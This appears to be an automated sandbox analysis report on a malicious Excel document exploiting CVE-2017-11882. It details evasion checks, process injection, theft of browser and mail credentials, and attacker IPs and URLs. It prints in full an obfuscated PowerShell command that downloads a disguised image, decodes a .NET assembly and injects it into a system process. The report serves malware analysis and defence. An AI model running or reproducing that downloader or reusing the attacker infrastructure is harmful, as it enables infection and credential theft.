                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: AddInProcess32.exe, 00000008.00000002.619828282.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1037Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3696Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2692Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 532Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1928Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2772Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: AddInProcess32.exe, 00000008.00000002.619828282.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: AddInProcess32.exe, 00000008.00000002.619828282.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: AddInProcess32.exe, 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00245318 CheckRemoteDebuggerPresent,8_2_00245318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03620639 mov edx, dword ptr fs:[00000030h]2_2_03620639
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.29 80Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 540, type: MEMORYSTR
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.csReference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
                  Source: 6.2.powershell.exe.61e08f4.3.raw.unpack, RunPEE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)
                  Source: 6.2.powershell.exe.33b9a80.1.raw.unpack, uRcQkDeJoO4.csReference to suspicious API methods: zHSk.OpenProcess(C6Nh1Wz8.DuplicateHandle, bInheritHandle: true, (uint)_4aIajlwkXEt2.ProcessID)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\datingloverstartingAgain.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('by6link = EnNhttp://91.92.254.194/imge/new-image_v.jpgEnN; by6webClient ='+' New-Object System.N'+'et.WebClient; tr'+'y { by6downloadedData = b'+'y6webClient.DownloadData(by6link) } catch { Write'+'-H'+'ost EnNFailed To download dat'+'a f'+'rom by6linkEnN -ForegroundColor Red; exit }; if (by6downloadedData -ne by6null) { by6ima'+'geT'+'ext = [System.Text.Encoding]::UTF8.GetString(by6downloadedData); by6star'+'tFlag'+' = EnN<<BASE64_START>>EnN; by6endFlag = EnN<<BASE64_END>>EnN; by6startIndex = by6imageText.IndexOf(by6startFlag); by6endIndex = by6ima'+'geTe'+'xt.I'+'ndexOf(by6en'+'dFlag); if (by6startIndex'+' -ge 0 -and b'+'y6endIndex -gt by6startIndex) { by6st'+'artIndex += by6startFl'+'ag.Length; by6base6'+'4Length = by6endIndex - by6startIndex; by6base64Co'+'mmand = by6imageText.Substring(by6startInd'+'ex, by6ba'+'se64Length); by6commandByt'+'es = [System.Convert]::FromBase6'+'4String(by6base64Command); by6loadedAssembly = [System.Reflection.Assembly]::L'+'oad(by6commandBytes); by6t'+'ype = by6loadedAssembly.GetType(EnNRunPE.HomeEnN); by6method = by6type.GetMethod(EnNVAIEnN).Invoke(by6null, [object'+'[]] (E'+'nNtxt.46esab/841.612.3.291//:ptthEnN , EnNdesativadoEnN , '+'EnNdesativa'+'doEnN , EnNdesativadoEnN,EnNA'+'dd'+'InProcess32EnN,EnNEn'+'N)) } }')-CREPLACE([CHar]98+[CHar]121+[CHar]54),[CHar]36 -rEpLaCe([CHar]69+[CHar]110+[CHar]78),[CHar]39)| iex"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "(('by6link = ennhttp://91.92.254.194/imge/new-image_v.jpgenn; by6webclient ='+' new-object system.n'+'et.webclient; tr'+'y { by6downloadeddata = b'+'y6webclient.downloaddata(by6link) } catch { write'+'-h'+'ost ennfailed to download dat'+'a f'+'rom by6linkenn -foregroundcolor red; exit }; if (by6downloadeddata -ne by6null) { by6ima'+'get'+'ext = [system.text.encoding]::utf8.getstring(by6downloadeddata); by6star'+'tflag'+' = enn<<base64_start>>enn; by6endflag = enn<<base64_end>>enn; by6startindex = by6imagetext.indexof(by6startflag); by6endindex = by6ima'+'gete'+'xt.i'+'ndexof(by6en'+'dflag); if (by6startindex'+' -ge 0 -and b'+'y6endindex -gt by6startindex) { by6st'+'artindex += by6startfl'+'ag.length; by6base6'+'4length = by6endindex - by6startindex; by6base64co'+'mmand = by6imagetext.substring(by6startind'+'ex, by6ba'+'se64length); by6commandbyt'+'es = [system.convert]::frombase6'+'4string(by6base64command); by6loadedassembly = [system.reflection.assembly]::l'+'oad(by6commandbytes); by6t'+'ype = by6loadedassembly.gettype(ennrunpe.homeenn); by6method = by6type.getmethod(ennvaienn).invoke(by6null, [object'+'[]] (e'+'nntxt.46esab/841.612.3.291//:ptthenn , enndesativadoenn , '+'enndesativa'+'doenn , enndesativadoenn,enna'+'dd'+'inprocess32enn,ennen'+'n)) } }')-creplace([char]98+[char]121+[char]54),[char]36 -replace([char]69+[char]110+[char]78),[char]39)| iex"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "(('by6link = ennhttp://91.92.254.194/imge/new-image_v.jpgenn; by6webclient ='+' new-object system.n'+'et.webclient; tr'+'y { by6downloadeddata = b'+'y6webclient.downloaddata(by6link) } catch { write'+'-h'+'ost ennfailed to download dat'+'a f'+'rom by6linkenn -foregroundcolor red; exit }; if (by6downloadeddata -ne by6null) { by6ima'+'get'+'ext = [system.text.encoding]::utf8.getstring(by6downloadeddata); by6star'+'tflag'+' = enn<<base64_start>>enn; by6endflag = enn<<base64_end>>enn; by6startindex = by6imagetext.indexof(by6startflag); by6endindex = by6ima'+'gete'+'xt.i'+'ndexof(by6en'+'dflag); if (by6startindex'+' -ge 0 -and b'+'y6endindex -gt by6startindex) { by6st'+'artindex += by6startfl'+'ag.length; by6base6'+'4length = by6endindex - by6startindex; by6base64co'+'mmand = by6imagetext.substring(by6startind'+'ex, by6ba'+'se64length); by6commandbyt'+'es = [system.convert]::frombase6'+'4string(by6base64command); by6loadedassembly = [system.reflection.assembly]::l'+'oad(by6commandbytes); by6t'+'ype = by6loadedassembly.gettype(ennrunpe.homeenn); by6method = by6type.getmethod(ennvaienn).invoke(by6null, [object'+'[]] (e'+'nntxt.46esab/841.612.3.291//:ptthenn , enndesativadoenn , '+'enndesativa'+'doenn , enndesativadoenn,enna'+'dd'+'inprocess32enn,ennen'+'n)) } }')-creplace([char]98+[char]121+[char]54),[char]36 -replace([char]69+[char]110+[char]78),[char]39)| iex"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2888, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.619828282.0000000002395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2888, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 540, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2888, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  Valid Accounts231
                  Windows Management Instrumentation
                  211
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  24
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  34
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts43
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager531
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts11
                  Command and Scripting Interpreter
                  Login HookLogin Hook1
                  Software Packing
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets261
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                  Process Injection
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467952 Sample: Nuevo orden.xlam.xlsx Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 21 other signatures 2->49 9 EXCEL.EXE 6 9 2->9         started        process3 file4 29 C:\Users\user\...\~$Nuevo orden.xlam.xlsx, data 9->29 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 41 192.3.216.148, 49161, 49164, 80 AS-COLOCROSSINGUS United States 12->41 31 C:\Users\...\datingloverstartingAgain.vbs, Unicode 12->31 dropped 33 C:\Users\...\datingloverstartingAgain[1].vbs, Unicode 12->33 dropped 73 Office equation editor establishes network connection 12->73 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->75 17 wscript.exe 1 12->17         started        file7 signatures8 process9 dnsIp10 35 91.92.254.29, 49162, 80 THEZONEBG Bulgaria 17->35 51 System process connects to network (likely due to code injection or exploit) 17->51 53 Suspicious powershell command line found 17->53 55 Wscript starts Powershell (via cmd or directly) 17->55 57 3 other signatures 17->57 21 powershell.exe 12 4 17->21         started        signatures11 process12 dnsIp13 37 91.92.254.194, 49163, 80 THEZONEBG Bulgaria 21->37 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->59 61 Writes to foreign memory regions 21->61 63 Injects a PE file into a foreign processes 21->63 25 AddInProcess32.exe 12 2 21->25         started        signatures14 process15 dnsIp16 39 ip-api.com 208.95.112.1, 49165, 80 TUT-ASUS United States 25->39 65 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->65 67 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->67 69 Tries to steal Mail credentials (via file / registry access) 25->69 71 3 other signatures 25->71 signatures17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Nuevo orden.xlam.xlsx75%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  Nuevo orden.xlam.xlsx54%VirustotalBrowse
                  Nuevo orden.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  ip-api.com0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://ip-api.com0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                  http://91.92.254.1940%Avira URL Cloudsafe
                  http://91.92.254.194/imge/new-image_v.jpgEnN;0%Avira URL Cloudsafe
                  http://192.3.216.1480%Avira URL Cloudsafe
                  http://91.92.254.194/imge/new-image_v.jpg100%Avira URL Cloudmalware
                  http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txtVO0%Avira URL Cloudsafe
                  http://192.3.216.148/base64.txt0%Avira URL Cloudsafe
                  http://192.3.216.148/base6L0%Avira URL Cloudsafe
                  http://192.3.216.148/datingloverstartingAgain.vbs0%Avira URL Cloudsafe
                  http://192.3.216.148/datingloverstartingAgain.vbsj0%Avira URL Cloudsafe
                  http://91.92.254.1944%VirustotalBrowse
                  http://192.3.21680%Avira URL Cloudsafe
                  http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txt0%Avira URL Cloudsafe
                  http://192.3.216.1481%VirustotalBrowse
                  http://192.3.216.148/datingloverstartingAgain.vbs0%VirustotalBrowse
                  http://192.3.216.148/datingloverstartingAgain.vbsj1%VirustotalBrowse
                  http://192.3.216.148/base64.txt1%VirustotalBrowse
                  http://91.92.254.194/imge/new-image_v.jpg1%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  208.95.112.1
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://91.92.254.194/imge/new-image_v.jpgtrue
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://192.3.216.148/base64.txttrue
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.216.148/datingloverstartingAgain.vbstrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ip-api.com/line/?fields=hostingfalse
                  • URL Reputation: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://91.92.254.194/imge/new-image_v.jpgEnN;powershell.exe, 00000006.00000002.475358209.0000000004EE0000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txtVOwscript.exe, 00000005.00000003.476573009.0000000000475000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476854751.0000000000478000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476757799.0000000000477000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476738936.0000000000475000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476938358.0000000000478000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://account.dyn.com/powershell.exe, 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://91.92.254.194powershell.exe, 00000006.00000002.473734424.0000000002389000.00000004.00000800.00020000.00000000.sdmptrue
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.216.148powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.475615054.00000000061A1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
